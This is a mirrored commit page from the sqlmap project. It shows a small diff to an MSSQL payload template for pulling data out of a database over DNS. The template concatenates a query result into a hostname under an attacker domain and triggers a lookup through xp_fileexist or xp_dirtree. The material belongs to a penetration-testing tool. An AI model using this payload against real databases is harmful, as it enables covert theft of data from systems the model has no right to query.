mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-03 22:31:34 +00:00
minor improvements regarding data retrieval through DNS channel
This commit is contained in:
parent
46cfa64d81
commit
e05109812f
8 changed files with 43 additions and 20 deletions
|
|
@ -1,4 +1,4 @@
|
|||
DECLARE @host varchar(1024);
|
||||
SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
|
||||
EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"');
|
||||
EXEC('xp_fileexist "\\' + @host + '\%PREFIX%%SUFFIX%"');
|
||||
# or EXEC('xp_dirtree "\\' + @host + '."');
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue